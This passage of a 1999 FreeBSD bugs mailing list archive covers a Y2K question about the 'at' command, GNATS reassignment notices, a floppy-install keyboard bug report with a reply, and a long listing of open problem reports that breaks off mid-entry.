wrote: > Reading the man pages for the 'at' command, I notice that year format > is displayed as YY (as opposed to YYYY). I wonder how someone will > enter an at command to run past the 31 Dec 1999 date. Also how would > the FreeBSD handle it. cvs log parse parsetime.c: ---------------------------- revision 1.12 date: 1998/05/05 01:53:15; author: alex; state: Exp; lines: +17 -1 Permit double digit year values to be used in the next millenium. ---------------------------- revision 1.7.2.2 date: 1998/07/04 17:03:36; author: alex; state: Exp; lines: +17 -1 MFC (rev 1.12): Permit double digit year values to be used in the next millenium. ---------------------------- So you should be able to do this: echo echo Welcome to a new era | at "0000 01/01/01" Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 4:44:50 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 90E9814BFD; Mon, 18 Oct 1999 04:44:47 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA07446; Mon, 18 Oct 1999 04:44:47 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Date: Mon, 18 Oct 1999 04:44:47 -0700 (PDT) From: Message-Id: <199910181144.EAA07446@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, marcel@FreeBSD.org Subject: Re: bin/14368: Update compat3x distribution Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update compat3x distribution Responsible-Changed-From-To: freebsd-bugs->marcel Responsible-Changed-By: sheldonh Responsible-Changed-When: Mon Oct 18 04:44:23 PDT 1999 Responsible-Changed-Why: Marcel, you wanna take a look at this? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 4:51:20 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7BB6614C2F; Mon, 18 Oct 1999 04:51:19 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA07920; Mon, 18 Oct 1999 04:51:19 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Date: Mon, 18 Oct 1999 04:51:19 -0700 (PDT) From: Message-Id: <199910181151.EAA07920@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, sheldonh@FreeBSD.org Subject: Re: kern/14371: Log message is missing \n Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Log message is missing \n Responsible-Changed-From-To: freebsd-bugs->sheldonh Responsible-Changed-By: sheldonh Responsible-Changed-When: Mon Oct 18 04:50:49 PDT 1999 Responsible-Changed-Why: Looks simple enough for me to handle. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 6:50: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6C0D214F2E for ; Mon, 18 Oct 1999 06:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA69298; Mon, 18 Oct 1999 06:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id CEC9C14D51; Mon, 18 Oct 1999 06:40:41 -0700 (PDT) Message-Id: <19991018134041.CEC9C14D51@hub.freebsd.org> Date: Mon, 18 Oct 1999 06:40:41 -0700 (PDT) From: jan.grant@bristol.ac.uk To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/14396: Floppy install of 3.2-release, 3.3-release hang without detecting keyboard Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14396 >Category: i386 >Synopsis: Floppy install of 3.2-release, 3.3-release hang without detecting keyboard >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Oct 18 06:50:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Jan Grant >Release: 3.3 >Organization: ILRT, Bristol University >Environment: Not applicable - didn't get that far >Description: Using the boot floppy/FTP install method on a Genie-2 Pentium II-350 machine from Viglen. (1245522-SEM is the serial number, exact motherboard details are available from their website keyed on this); BIOS is PhoenixBIOS 4.0 rel 6.0, dated 08/20/98. Boot didn't progress very far: "keyboard: no" was displayed. Either the bios or the bootloader can't see the keyboard. I've called this a "low prioprity" problem 'cause it's simple to work around; however, failing at the first hurdle may put off potential BSD users. >How-To-Repeat: I tried this in multiple configurations on a few recent Viglen machines, all had the same BIOS revision. >Fix: The workaround I used was to drop into BIOS setup and exit during the floppy boot. Note, this doesn't affect normal operation, just the installation. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 7:20: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 26C5314A31 for ; Mon, 18 Oct 1999 07:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA72703; Mon, 18 Oct 1999 07:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Mon, 18 Oct 1999 07:20:01 -0700 (PDT) Message-Id: <199910181420.HAA72703@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: i386/14396: Floppy install of 3.2-release, 3.3-release hang without detecting keyboard Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/14396; it has been noted by GNATS. From: Sheldon Hearn To: jan.grant@bristol.ac.uk Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: i386/14396: Floppy install of 3.2-release, 3.3-release hang without detecting keyboard Date: Mon, 18 Oct 1999 16:09:44 +0200 On Mon, 18 Oct 1999 06:40:41 MST, jan.grant@bristol.ac.uk wrote: > >Synopsis: Floppy install of 3.2-release, 3.3-release hang without > >detecting keyboard Are you sure you get this with 3.3-RELEASE and not 3.2_RELEASE? This was a known problem with 3.2-RELEASE, but it's not mentioned in the 3.3-RELEASE ERRATA.TXT. See http://www2.za.freebsd.org/releases/3.2R/errata.html . Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 7:37:23 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CCCD714BF9; Mon, 18 Oct 1999 07:37:22 -0700 (PDT) (envelope-from hm@FreeBSD.org) Received: (from hm@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA74223; Mon, 18 Oct 1999 07:37:22 -0700 (PDT) (envelope-from hm@FreeBSD.org) Date: Mon, 18 Oct 1999 07:37:22 -0700 (PDT) From: Message-Id: <199910181437.HAA74223@freefall.freebsd.org> To: ob@seicom.net, hm@FreeBSD.org, freebsd-bugs@FreeBSD.org, hm@FreeBSD.org Subject: Re: kern/13841: ISDN i4b does not hang up Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ISDN i4b does not hang up State-Changed-From-To: open->suspended State-Changed-By: hm State-Changed-When: Mon Oct 18 07:32:00 PDT 1999 State-Changed-Why: This fix is part of the i4b distribution since 05/99 and has not been integrated into i4b because of a drawback in the very first connection handling when thisis patch was applied. According to some testers from the i4b development this patch in its current form is not the right way to solve the problem. Responsible-Changed-From-To: freebsd-bugs->hm Responsible-Changed-By: hm Responsible-Changed-When: Mon Oct 18 07:32:00 PDT 1999 Responsible-Changed-Why: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 18 11: 0:50 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 389B915106 for ; Mon, 18 Oct 1999 11:00:08 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA91589 for freebsd-bugs@freebsd.org; Mon, 18 Oct 1999 11:00:03 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 18 Oct 1999 11:00:03 -0700 (PDT) Message-Id: <199910181800.LAA91589@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: Current problem reports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The report has been examined by a team member and evaluated. f - feedback The problem has been solved, and the originator has been given a patch or a fix has been committed. The PR remains in this state pending a response from the originator. s - suspended The problem is not being worked on. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1996/12/20] bin/2258 wollman route add/delete [network] xxx.yyy.zzz.0 o [1997/03/08] kern/2923 panic: vm_fault: fault on nofault entry, o [1997/07/03] kern/4021 peter Local mount of a local NFS exported direc o [1997/07/31] kern/4200 peter NFS: "vm_fault: fault on nofault entry" w o [1997/10/01] kern/4673 Two panics, now crash dumps, always in re o [1997/11/10] kern/4996 peter NFS crash, possibly related to file bigge o [1997/11/24] bin/5139 sheldonh portmap does not find interfaces correctl f [1997/12/21] kern/5355 Fix for NULLFS problems o [1998/02/03] kern/5641 peter running processes at the IDLE priority (i o [1998/02/10] kern/5703 CDROM Media Error triggers complete syste o [1998/03/23] bin/6121 peter gethostbyname(3) no longer returns NO_DAT s [1998/05/13] kern/6630 julian [PATCH] Fix for Cyrix I8254 bug o [1998/06/23] kern/7028 Panic in vinvalbuf when appending/looking o [1998/07/12] kern/7264 gibbs Buslogic BT 950 scsi card not detected o [1998/08/15] kern/7622 Kernel panic with Fatal trap 18. f [1998/09/03] kern/7822 n_hibma Machine Reboots without reason o [1998/09/06] kern/7843 Unable to install FreeBSD on Tekram DC-39 o [1998/09/08] i386/7859 luigi fatal trap 12 in midi_synth_input f [1998/09/14] kern/7927 n_hibma Fatal trap 12: page fault while in kernel o [1998/09/28] kern/8074 se CAM rescan operation fatal o [1998/10/03] gnu/8138 peter gcc -pipe xxx.s hangs f [1998/10/06] i386/8179 Install failure with motherbord using SIS f [1998/10/08] i386/8214 n_hibma Install 3.0-19981006-BETA fails f [1998/11/04] conf/8576 n_hibma server goes down when client mount its fi a [1998/11/08] ports/8609 nectar eklogin service (kerberos klogind) fails f [1998/11/12] i386/8673 bug in vm_page_alloc_contig() o [1998/11/24] bin/8829 bug in innetgr (was: Fix port: security/s f [1998/11/25] kern/8861 n_hibma under heavy (multi interface) traffic ep0 f [1998/12/09] kern/9036 Boot 3.0-Release hangs with BT-445S after a [1999/01/05] kern/9334 n_hibma cp fails for 2048 Bytes/sector media a [1999/01/26] i386/9709 n_hibma Kernel page faults during boot with 2GB R o [1999/01/27] kern/9742 tx driver for smc autodetects fine, but n o [1999/02/02] misc/9885 BIND 8.1.2 core dumping o [1999/02/04] kern/9909 Writing incomplete blocks to /dev/nrst0 h o [1999/02/19] kern/10166 panic during heavy sio i/o;no coproc; ves o [1999/02/20] kern/10172 panic: cannot allocate pipe - out of kvm a [1999/02/21] i386/10188 n_hibma Cannot get system to boot after Installti o [1999/02/23] kern/10224 panic: pipeinit: cannot allocate pipe -- s [1999/02/26] kern/10281 Crash of 3.1-STABLE system due to scsi er o [1999/02/26] i386/10282 PCMCIA problems in 3.1-RELEASE? o [1999/03/01] kern/10332 gibbs System freezes during certain SCSI activi o [1999/03/01] bin/10344 fenner Core dump in gethostbyaddr for 199.93.70. o [1999/03/05] kern/10397 3.1R page fault while in kernel mode, fro o [1999/03/07] misc/10473 Incorrect aout compat libraries in XF8633 o [1999/03/09] kern/10507 Process hangs in state VM pgd o [1999/03/09] misc/10509 Cvs can hang system when used with pserve o [1999/03/09] kern/10520 can't exec files under nullfs o [1999/03/11] kern/10542 page fault while in kernel mode, not kern o [1999/03/11] kern/10545 When a fork/exec stress test is run, the o [1999/03/12] misc/10566 obrien patch dhcpc problem on /etc/pccard_ether o [1999/03/17] kern/10636 ipfw problems o [1999/03/19] i386/10683 I have a buslogic BT-948 FW controller. W o [1999/03/20] i386/10690 Installation freezes after device selecti f [1999/03/20] kern/10701 ppbus printing problems o [1999/03/22] ports/10725stb Wrong Cyrus IMAP deliver group o [1999/03/23] bin/10744 call to login() from aout/libutil.so.2.2 o [1999/03/27] kern/10828 3.1-STABLE freezes when writing to floppy o [1999/03/29] kern/10866 ahc2740 panic o [1999/03/30] kern/10872 Panic in sorecieve() due to NULL mbuf poi o [1999/04/05] kern/10959 3.1-STABLE crashes due to a floppy mount o [1999/04/05] ports/10965obrien lcc-3.6 unable to compile anything o [1999/04/08] kern/11023 Synchronous PPP not functional in leased o [1999/04/13] kern/11112 Amanda on FreeBSD can wipe the _next_ tap o [1999/04/16] kern/11180 boot of fresh bsd3.1 hangs o [1999/04/17] kern/11196 n_hibma kernel mode page fault o [1999/04/19] misc/11216 Power fail versus Fsck changed my life. o [1999/04/19] kern/11226 Invalid files on disk after fsync o [1999/04/20] kern/11238 Synchronous PPP not functional in leased o [1999/04/20] kern/11241 Install fails after SCSI probe o [1999/04/22] i386/11278 FreeBSD Version 3.1 reboots repeatedly (c o [1999/04/23] i386/11298 Enabling IDE DMA on Opti Viper-M crashes o [1999/04/26] kern/11330 page fault in generic_bzero o [1999/04/26] conf/11343 worm; problems with installation and boot o [1999/04/26] i386/11349 Error Mounting /dev/wd0s1 on dist during o [1999/04/27] kern/11351 system reboot for error with popper and d o [1999/05/01] kern/11434 can't boot from wd0s2a a [1999/05/03] kern/11470 dillon V3 NFS problem o [1999/05/04] i386/11488 Error while starting FreeBSD o [1999/05/10] kern/11629 File descriptor table sharing is broken o [1999/05/12] kern/11680 server freezes, all processes stuck in "i o [1999/05/13] i386/11681 gibbs Adaptec 2940 UW SCSI Controller BIOS 1.34 o [1999/05/14] kern/11707 ncr isn't recognized in 3.1-19990512-STAB f [1999/05/17] bin/11744 perllib fails to build o [1999/05/24] kern/11869 wpaul Network hangging due to xl0: tx underrun o [1999/05/31] kern/11966 TCP copies send and receive socket buffer f [1999/06/01] kern/11984 pthread_kill cannot kill select() threads o [1999/06/02] kern/11988 recvmsg with a cmsghdr but no iovec is br o [1999/06/02] kern/11993 panic: getnewbuf: inconsistent EMPTY queu f [1999/06/05] kern/12041 n_hibma Crashes on startup if Zip drive is switch o [1999/06/06] conf/12050 No /sbin/init on fixit flop o [1999/06/07] kern/12072 vm_fault happened in binary file transfer o [1999/06/09] ports/12098se KDM not config'd properly o [1999/06/09] kern/12106 error 6: panic: cannot mount root o [1999/06/10] kern/12127 persistent crash on idle SMP system o [1999/06/15] kern/12233 Fvwm2 causes FreeBSD-current to hang or r o [1999/06/16] bin/12243 NFS re-mount from Solaris 7 server hangs o [1999/06/16] kern/12248 CRON in malloc(): warning: pointer to wr o [1999/06/18] i386/12286 Segmentation violation when invoking JNI s [1999/06/23] kern/12367 Writing files larger than floppy capacity o [1999/06/25] misc/12390 Installation hangs during extraction o [1999/06/25] kern/12395 gibbs Buslogic SCSI cards (BT948) time out unde o [1999/06/30] kern/12466 Fast system hangs under high FS load o [1999/07/05] kern/12521 lmbench-1.1's context switching test hang o [1999/07/12] misc/12607 System crashes after boot, portmap endles o [1999/07/13] alpha/12623alpha Certain valid numeric strings cause a SIG f [1999/07/20] misc/12720 gdbm (And possibly other libraries in /us o [1999/07/21] kern/12730 poll() causes indeterministic program han o [1999/07/21] misc/12743 Cannot boot the 3.2 floppies o [1999/07/23] i386/12777 jkh 3.1 RELEASE -> 3.2 upgrade is incomplete, o [1999/07/26] bin/12819 billf tcpd hosts.[allow|deny] location inconsis o [1999/08/02] misc/12923 Installation fails on HP Net Server o [1999/08/04] kern/12980 NetGear Dec 21140AF Ethernet Card unrecog o [1999/08/06] bin/12998 des still inetd junk pointer too low to make o [1999/08/10] i386/13059 imp Install aborts with panic:aha0: Invalid C o [1999/08/11] kern/13075 signal is not posted for async I/O on raw a [1999/08/20] kern/13270 dillon NFS hangs if written through self-mount o [1999/08/23] alpha/13338alpha panic: pmap_remove_all: pv_table for 162b o [1999/08/24] kern/13352 No support for Promise Ultra/66 o [1999/08/30] misc/13474 Maximum Number of IPs Permitted in the .. o [1999/09/07] bin/13615 awk corrupts the memory arena when OFMT i o [1999/09/09] alpha/13653alpha panic: pmap_remove_all: pv_table for 90b6 o [1999/09/12] kern/13709 panic: sched_sync: fsync failed o [1999/09/17] i386/13797 SMP/NFS panics on 3.3-RC o [1999/09/18] i386/13802 freebsd 3.3 fails to boot with irq proble o [1999/09/19] i386/13817 system reboot o [1999/09/19] kern/13825 tx0 "holds" packets for long periods, eve o [1999/09/19] i386/13844 keyboard locks up when I page through a m f [1999/09/20] i386/13849 grog dump on vinum r5 freezes system o [1999/09/22] i386/13892 Kern.flp does not boot on Compaq Presario o [1999/09/24] i386/13933 nfs server panics in tulip_rx_intr() o [1999/09/24] kern/13940 Panic with dd on block/"cooked" devices u o [1999/09/24] kern/13944 ATAPI cd-rom not boot to install, nor de o [1999/09/27] misc/13995 Full duplex mode doesn't work right with o [1999/09/28] kern/14028 ATAPI cd-rom not boot to install and can' o [1999/09/28] i386/14030 imp aha0 probe fails 3.3.0-RELEASE install wi o [1999/09/29] kern/14034 gettimeofday() returns negative value o [1999/10/05] kern/14141 3.3-RELEASE crashing often o [1999/10/05] ports/14154obrien xwpe is not completely compiled o [1999/10/06] kern/14162 sudden reboot problem ( maybe kernel pani o [1999/10/08] misc/14204 error 6: panic: cannot mout root(2) o [1999/10/08] ports/14205se kde lock screen can't verify passwd o [1999/10/10] i386/14256 System doesn't boot under FreeBSD 3.2 o [1999/10/13] pending/14308gnats-admineaeao o [1999/10/14] kern/14322 mount respects permissions of underlying o [1999/10/14] ports/14343ports [patch] wget-1.5.3 failed to continue ret o [1999/10/15] kern/14347 kdump & truss won't compile because addit o [1999/10/17] i386/14373 Error while booting from floppy disk 147 problems total. Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [1995/03/20] kern/260 davidg msync and munmap don't bother to update m o [1995/10/18] bin/786 wpaul Problem with NIS and large group maps f [1996/05/26] kern/1256 ZNYX 314 mysterously looses packets o [1996/06/07] kern/1301 davidg DEC FDDI/PCI Adapter: halt code = 6 (DMA f [1996/08/03] bin/1461 Incorrect address binding of Kerberized r o [1996/08/22] kern/1533 Machine can be panicked by a userland pro o [1996/09/29] kern/1689 wollman TCP extensions throttles distant connecti o [1996/10/04] kern/1726 panic in kmem_malloc (dump available) o [1996/10/08] kern/1744 peter run queue or proc list smashed 4 times in f [1996/10/21] kern/1856 peter read-only nfs mount: panic leaf should be s [1996/10/26] bin/1892 n_hibma install(1) removes target file s [1996/11/08] gnu/1981 ypserv handles null key incorrectly a [1996/11/14] kern/2014 sos Console keyboard lockup problem o [1996/11/18] kern/2053 peter de0 driver don't work at 100M for Compex o [1996/12/22] kern/2270 Hayes ESP serial card locks system as of a [1996/12/30] kern/2325 quota.user enlarged, no boot on 2.2-BETA f [1997/01/09] bin/2430 grog mountd stops on loading if subnet mask is a [1997/01/21] bin/2549 sos cdcontrol refuses to play audio CDs from s [1997/02/03] kern/2647 changing existing route to -static crashe o [1997/02/05] kern/2667 wollman bpfattach can hang the system a [1997/02/06] kern/2675 lkmcioctl() is not consistent and careful o [1997/02/07] kern/2690 asami When Using ccd in a mirror mode, file cre o [1997/02/08] kern/2695 sio1 (16540 serial port) is not recognize o [1997/02/09] kern/2698 After rewind I cannot read a tape; blocks o [1997/02/12] kern/2719 added support for magneto-optical SCSI di o [1997/02/15] kern/2742 panic: leaf should be empty o [1997/02/15] bin/2747 davidn cannot submit at jobs from within an at j o [1997/02/16] gnu/2749 peter cvs export using remote cvs fails - CVS/T o [1997/02/19] kern/2768 ktrace(1) -i dumps corrupted trace data o [1997/02/19] bin/2769 fsck needs several runs to clean up bad/d o [1997/02/19] kern/2770 panic: vm_fault: fault on nofault entry o [1997/02/19] kern/2771 panic: bad dir o [1997/02/19] kern/2773 peter bad dir panic o [1997/02/20] bin/2785 wpaul callbootd uses an unitialized variable o [1997/02/20] gnu/2786 gcc version 2.7.2.1 C compiler slows down o [1997/02/22] kern/2800 DDS large data writing probrem o [1997/03/01] kern/2840 mlock+minherit+fork+munlock causes panics o [1997/03/03] kern/2858 peter FreeBSD NFS client can't mount filesystem o [1997/03/04] kern/2873 the od0 devies does not handle a Maxoptix o [1997/03/08] kern/2919 vm_fault: fault on nofault entry, addr: f o [1997/03/11] bin/2948 can't dump 640MB optical disks o [1997/03/12] kern/2965 st0 hang/fail on reading 4mm DAT tape for o [1997/03/15] kern/2991 RTF_LLINFO routes remain when interface i o [1997/03/18] kern/3021 panic after sync during reboot o [1997/03/21] bin/3055 umount -f does not work o [1997/04/01] bin/3170 vi freaks and dump core if user doesn't e o [1997/04/05] kern/3201 peter de0 not re-enabled after hub down o [1997/04/06] kern/3216 panic: pmap_zero_page: CMAP busy o [1997/04/06] kern/3219 sppp or arnet gets looped after connectio o [1997/04/15] bin/3305 Can't do encrypted rlogin into self o [1997/04/25] kern/3381 peter 2.2.x kernel panic on traversing and remo o [1997/04/25] kern/3384 telldir-seekdir can cause livelock o [1997/05/01] gnu/3441 obrien C++ exceptions don't work in shared libra o [1997/05/01] kern/3463 netstat -I packet count increase on sl0 w f [1997/05/04] i386/3502 Merge of if_ix* and if_ie* broke EE/16 su o [1997/05/06] bin/3524 imp rlogin doesn't read $HOSTALIASES for non- o [1997/05/07] kern/3527 peter if_de.c doesn't recognize Kingston card p o [1997/05/09] kern/3564 using MPU401 driver pagefaults kernel o [1997/05/09] kern/3569 ex0 driver doesn't work with EtherExpress o [1997/05/12] kern/3579 peter de driver doesn't support newer SMC 9332 o [1997/05/12] kern/3581 intermittent trap 12 in lockstatus() o [1997/05/12] kern/3582 panic: bad dir (mangled entry) in 2.2-STA s [1997/05/25] kern/3685 [PATCH] panic: fdesc attr o [1997/05/30] kern/3726 peter process hangs in 2.2-stable when working o [1997/05/30] kern/3727 SCSI II tape support broken o [1997/06/03] kern/3771 NFS hangs when writing to local FS re-mou o [1997/06/04] i386/3779 changing cursor to blinking block causes o [1997/06/08] gnu/3810 cvs can't handle multiple multiple-path d o [1997/06/18] kern/3899 df while unmounting floppy crashes 2.2.2 o [1997/06/19] kern/3909 joerg A patch supporting some new worm drivers o [1997/06/19] gnu/3910 sort(1) of 2.2.1R doesn't work in special o [1997/06/28] misc/3980 peter access via NFS fails during mount-operati o [1997/06/29] bin/3986 rdist seg faults when target machine is d o [1997/07/02] kern/4012 peter 2.2-RELEASE/Digital UNIX NFSv3 0 length f o [1997/07/02] misc/4013 boot floppy hangs if IDE ZIP Drive presen s [1997/07/06] gnu/4042 gdb stackframe in static library shows no o [1997/07/12] bin/4078 sos Typed password to log in on console and i o [1997/07/17] kern/4115 peter SunOS NFS file has wrong owner if creator o [1997/07/26] bin/4176 restore gets confused when run over pipe f [1997/07/27] ports/4179 fenner lmbench-1.1 dumps core after asking for m o [1997/07/28] kern/4186 peter nfsiod, panic, page fault in kernel mode o [1997/07/30] kern/4194 peter kernel pci driver for Digital 21041 Ether o [1997/08/06] kern/4240 kernel fails to recognise 2nd serial port o [1997/08/08] conf/4252 peter sendmail doesn't use smrsh by default o [1997/08/10] kern/4260 EOF handling in st(4) is broken o [1997/08/10] kern/4265 Panic in dsinit when multiple FreeBSD sli o [1997/08/10] kern/4270 ch driver does not use bounce buffers o [1997/08/12] kern/4284 le0 goes OACTIVE after some time o [1997/08/13] kern/4295 SL/IP difficulties between 2.2.1 & 2.2.2 o [1997/08/16] kern/4312 arp table gets messed up, syslog "gateway o [1997/08/17] kern/4327 peter NFS over TCP reconnect problem s [1997/08/19] kern/4338 New device driver (Cyclades Cyclom-Z) o [1997/08/22] bin/4357 wosch bug in adduser script causes duplicate UI o [1997/08/25] kern/4381 mount -t msdos causes panic:vm_fault o [1997/09/02] kern/4454 X drops characters/locks up keyboard when o [1997/09/03] bin/4460 lpd hangs exiting (IE in ps table) o [1997/09/10] kern/4508 peter nfs3 data integrity problems o [1997/09/11] kern/4513 System lockup appears to be VM related. o [1997/09/14] i386/4533 Server with Cyclom-Y PCI card rebooted at o [1997/09/20] kern/4588 peter NFS access locks up o [1997/09/21] kern/4600 peter nfs lookups might give incorrect result o [1997/09/30] kern/4663 checkalias panic o [1997/10/01] kern/4666 dfr umount -f doesn't seem to work o [1997/10/01] bin/4672 rdist does not do hard links right when t o [1997/10/03] bin/4683 imp restore doesn't correctly handle "sparse" o [1997/10/05] docs/4691 no documentation for mk_cmds(1) o [1997/10/16] kern/4774 trying to use IBCS2 shared libraries cras o [1997/10/16] kern/4782 Under certain conditions, several krsh's o [1997/10/31] kern/4909 de ethernet driver is crazy on 100base o [1997/11/01] bin/4913 peter Large mail messages can cause mail.local o [1997/11/03] kern/4927 kernel does not check any quota and permi o [1997/11/05] kern/4945 continued failure to use the Adaptec 1460 o [1997/11/05] bin/4949 rpc.rquotad stat()s fs with quota file in o [1997/11/09] kern/4990 peter NFS hangs under FastEthernet. 1024 Bytes o [1997/11/15] conf/5062 login.access not evaluated correctly a [1997/11/18] bin/5084 ru wrong "term" for internal shell o [1997/11/18] kern/5085 System crash during mount command for CD o [1997/11/22] gnu/5126 C++ compiler bug (assembly output) o [1997/11/23] i386/5128 Adaptec 2940U Timeouts with QUANTUM disk o [1997/12/06] kern/5244 F00F workaround dosn't always work on SMP s [1997/12/14] bin/5297 make incompatibility with System V style o [1997/12/19] kern/5347 peter DEC (de0) ethernet card has no buffers af o [1997/12/30] kern/5396 fdesc fs crashes system o [1997/12/31] i386/5401 peter de0 selects wrong media when reconnected f [1998/01/08] kern/5456 After writing more than 100MB to SCSI Exa o [1998/01/16] kern/5513 luigi new PnP code is BAD (soundcards) s [1998/01/19] kern/5522 [PATCH] ip_input.c & ip_output.c problems o [1998/01/26] misc/5574 bootpd gets timezone incorrectly o [1998/01/27] kern/5587 session id gets dropped o [1998/01/29] kern/5598 Support for magneto-optic SCSI devices wi s [1998/01/30] bin/5604 setenv(3) function has memory leak, other o [1998/01/31] kern/5611 bind does not check sockaddr->sin_family o [1998/02/01] kern/5618 kernel memory leak in routetbl. o [1998/02/01] kern/5624 dumping to tape causes scsi bus reset o [1998/02/04] kern/5643 NCR 810/815 do not handle rewind correctl o [1998/02/09] bin/5693 hoek groff -mm or groff -mmm ??? o [1998/02/10] i386/5698 des LPIP causes spurious reboots o [1998/02/12] kern/5728 peter NFS hangs o [1998/02/12] kern/5731 peter executables wedge on "vmopar" when built o [1998/02/17] gnu/5767 man leaves partially formatted cat pages o [1998/02/19] kern/5794 Kernel Panic f [1998/02/27] bin/5867 peter pppd or FreeBSD ? o [1998/02/28] kern/5877 sb_cc counts control data as well as data o [1998/03/01] kern/5890 peter NFS server Side say NFSERR_BAD_COOKIE (rm o [1998/03/09] bin/5959 Cannot set up clocal gettys o [1998/03/10] kern/5969 non-root user can reboot/lock up system o [1998/03/11] kern/5975 can't boot freebsd: fatal trap12: page fa o [1998/03/14] conf/6002 peter /etc/mail/sendmail.cf.addtions seems to l o [1998/03/16] kern/6035 The system "sort-of" hangs when playing b o [1998/03/19] kern/6066 lnc driver does not work correctly with A o [1998/03/22] i386/6099 des LPIP to slow machine causes hang o [1998/03/22] kern/6103 panic: ffs_valloc: dup alloc o [1998/03/28] bin/6162 kinit does not default to the current use o [1998/04/03] kern/6203 kernel panics with "blkfree: freeing free o [1998/04/03] conf/6205 NFS/NIS freak out o [1998/04/04] kern/6212 Two bugs with MFS filesystems fixed, one o [1998/04/07] kern/6238 luigi Sound-driver patch for MAD16 (OPTi 928,92 o [1998/04/08] kern/6251 peter ktrace very broken when logging over NFS o [1998/04/08] kern/6252 ide cdrom hangs system when on same bus a o [1998/04/09] kern/6253 Atapi wait for command phase too short. o [1998/04/10] kern/6267 dg panic: pmap_dispose_proc: upage already m o [1998/04/14] kern/6300 System locks up in SMP mode when accessin o [1998/04/17] kern/6336 peter NFSv3 should support files >2GB, but does o [1998/04/18] kern/6344 cy driver is outdated o [1998/04/19] kern/6351 DPT RAID controller stops working under h o [1998/04/20] i386/6368 Stallion Easyio 8 port not detected using o [1998/04/22] bin/6383 csh - when ctrl-d is pressed, file is chm o [1998/04/25] kern/6412 peter NFS sends packets from the wrong interfac o [1998/05/03] kern/6506 system will not soft reboot f [1998/05/05] 